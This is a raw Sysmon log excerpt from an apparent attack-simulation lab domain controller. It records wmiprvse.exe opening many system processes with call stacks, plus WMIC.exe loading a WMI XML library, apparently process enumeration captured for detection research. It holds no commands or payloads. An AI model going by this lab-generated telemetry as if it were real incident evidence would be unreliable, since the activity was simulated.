12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8300-00000000F101}4940C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8897-6164-8100-00000000F101}4780C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8897-6164-8000-00000000F101}4756C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-888A-6164-7300-00000000F101}3512C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-888A-6164-7100-00000000F101}3344C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8880-6164-4400-00000000F101}3576C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887F-6164-3700-00000000F101}3276C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887E-6164-3100-00000000F101}1964C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2E00-00000000F101}3028C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 734700x800000000000000057349754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\xml\wmi2xml.dll10.0.14393.0 (rs1_release.160715-1616)WMI XML ConvertorMicrosoft® Windows® Operating SystemMicrosoft Corporationwmi2xml.DLLMD5=DF861EE7A64473D2413A7318D8B97F6F,SHA256=C7789C6A4BEC11838ECB46C0B411172A0E179AE411B1C11BF073A5253FB5674BtrueMicrosoft WindowsValid 10341000x800000000000000057349753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2B00-00000000F101}2892C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2A00-00000000F101}2884C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2500-00000000F101}2752C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8877-6164-2300-00000000F101}2588C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 